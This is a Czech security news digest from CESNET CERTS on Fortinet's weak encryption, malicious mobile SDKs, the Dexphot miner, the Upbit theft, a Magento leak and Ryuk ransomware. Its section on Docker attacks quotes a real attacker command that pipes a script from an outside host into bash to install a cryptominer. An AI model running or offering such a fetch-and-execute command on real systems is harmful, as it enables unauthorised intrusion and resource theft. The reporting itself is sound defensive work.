Hlavní navigace

Postřehy z bezpečnosti: zase ty kryptoměny

CESNET CERTS

V dnešním díle postřehů se podíváme na děravou komunikaci u Fortinetu, varování Facebooku, Twitteru a Microsoftu, napadení kryptoměnové burzy, únik dat v obchodu Magento a na další zajímavosti ze světa IT.

Doba čtení: 4 minuty

Sdílet

Děravá komunikace u Fortinetu

Výzkumníci objevili několik bezpečnostních problémů v produktech od firmy Fortinet. Slabá šifra – funkce XOR se statickým klíčem − je používána ke komunikaci s cloudovými službami FortiGuard Web Filtr, Antispam a Antivirus.

Útočník by mohl slabiny zneužít k odposlechu či manipulaci uživatelského provozu. Zranitelnost je sledovaná jako CVE-2018–9195. Experti publikovali PoC (proof-of-concept) kód v jazyce Python 3, který dokáže dekryptovat zprávu FortiGuard. Zranitelnosti jsou opravené ve verzích FortiOS 6.0.7 nebo 6.2.0, FortiClient pro Windows 6.2.0 a FortiClient pro Mac 6.2.2. Byla vydána také bezpečnostní výstraha výrobce.

Facebook a Twitter varuje

Facebook a Twitter odhalily, že nějaké aplikace třetích stran tiše shromažďují osobní údaje lidí bez jejich vědomí. Firma sdělila, že příčinou takového chování jsou zákeřné SDK používané některými aplikacemi třetích stran. Aplikace, které použily zákeřný SDK vytvořený marketingovou firmou OneAudience, byly schopny kromě zobrazování reklam také shromažďovat uživatelská jména, e-mailové adresy a tweety.

Twitter informoval své uživatele o této neautorizované aktivitě některých aplikací. Twitter rovněž upozornil Google, Apple a ostatní průmyslové partnery s žádostí o blokaci zákeřného SDK a aplikací používající jeho kód.

Facebook ohlásil, že identifikoval přinejmenším dva SDK vyvinuté za podobným účelem, jeden od OneAudience a druhý od MobiBurn.

Microsoft varuje před Dexphotem

Microsoft odhalil, že těžařský malware Dexphot již celosvětově infikoval přes 80000 počítačů. Dexphot je zajímavý svými technikami bránícími odhalení a svou úrovní složitosti. Používá obfuskaci, šifrování, randomizaci jmen souborů během instalace a následně bezsouborové techniky spuštění škodlivého kódu přímo v paměti.

Malware kvůli svému zamaskování využije běžný systémový proces a pokud není zastaven, tak těží kryptoměnu a zároveň využívá systémový časovač k případnému znovuprovedení infekce, pokud je odstraněn ze systému pouze částečně.

Hacknutí kryptoměnové burzy

Jihokorejská burza Upbit byla napadena hackery, kteří ukradli kryptoměnu Ethereum v přepočtu za 48,5 milionu dolarů. Ředitel firmy Doo-myeon, která provozuje burzu Upbit, Lee Seok-woo prohlásil, že firma pokryje ztrátu vzniklou ukradenými fondy v kryptoměně a že se burza vrátí k normální činnosti v řádu týdnů.

V reakci na napadení burza převedla všechny své fondy z horké peněženky (Hot Wallet) do studené peněženky (Cold wallet). Někteří uživatelé na Internetu spekulují o tom, zda se jedná o skutečné napadení burzy, nebo zda jde o podvod ze strany burzy, tzv. exit scam.

Únik dat v obchodu Magento

Adobe, jakožto firma vlastnící platformu Magento, varuje, že pokud jste něco prodávali nebo nakupovali v platformě Magento, je nutné si změnit heslo. Uniklá databáze obsahuje mimo jiné uživatelská jména, e-mailové adresy, MageID a platební a doručovací adresy. Firma zároveň ubezpečila, že nebyly kompromitovány žádné digitální produkty ani služby.

Velké zatýkání

V rámci akce GAAD (Global Airline Action Days) bylo zatčeno celosvětově 79 lidí v souvislosti s nákupem letenek na zneužité platební karty. Bylo prošetřeno 165 podezřelých transakcí a identifikováno 79 podezřelých, kteří byli zadrženi nebo uvězněni.

Některé z případů se týkají ilegální migrace, kdy cestující měli falešné pasy nebo používali ukradenou identitu. Jednalo se o operaci, která prokázala dobrou spolupráci mezi různými agenturami z veřejného a privátního sektoru se stejným cílem a to potlačit podvody s nákupem letenek.

Skupina hackerů ohrožuje Docker

Skupina hackerů se zmocňuje systémů Docker s vystaveným API rozhraním. V současné době skupina skenuje více než 59000 sítí za účelem instalace software k těžení kryptoměn. Jakmile skupina identifikuje zranitelný systém, spustí Alpine Linux OS kontejner, ve kterém spustí následující příkaz:

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

Hořejší příkaz stáhne a spustí Bash skript ze serveru útočníka, který následně instaluje těžařský software XMRRig. Hackeři se rovněž pomocí dalšího skriptu snaží odinstalovat nejen monitorovací a bezpečnostní software, ale i procesy patřící ke konkurenčním těžařským botnetům.

Ransomware napadl bezpečnostní firmu Prosegur

Španělská mezinárodní bezpečnostní firma Prosegur oznámila, že byla napadena ransomwarem, který narušil její telekomunikační platformu. Síť firmy Prosegur byla napadena ransomwarem Ryuk a firma následně omezila komunikaci se zákazníky, aby tak zabránila šíření malware. Španělský web Derecho de la Red incident potvrdil a oznámil, že zaměstnanci byli posláni domů a že infekce ovlivnila všechny evropské pobočky firmy.

Kampaň kyberkriminálníků v pohostinství

Jak reportovali experti společnosti Kaspersky, pohostinství je stále významným cílem kybernetických kriminálníků, kteří útočí na hotely, řetězce restaurací a turistické služby. Útočníci byli aktivní již od roku 2015, ale jejich aktivita dosáhla vrcholu v roce 2019.

Skupina útočníků operovala zejména v Brazílii, ale experti z Kaspersky oznámili, že oběti jsou i v jiných státech, a to v Argentině, Bolívii, Chile, Costa Rice, Francii, Itálii, Mexiku, Portugalsku, Španělsku, Thajsku a Turecku.

Diners Vánoce 2019

Útočníci se zaměřovali na krádeže informací o kreditních kartách spravovaných jak hotely, tak např. portálem Booking.com. Při útoku bylo použito phishingových emailů s nakaženými přílohami typu Word, Excel nebo PDF. Útočníci použili domény vizuálně podobné doménám skutečných firem.

Ve zkratce

Pro pobavení:

O seriálu

Tento seriál vychází střídavě za pomoci pracovníků Národního bezpečnostního týmu CSIRT.CZ provozovaného sdružením CZ.NIC a bezpečnostního týmu CESNET-CERTS sdružení CESNET. Více o seriálu…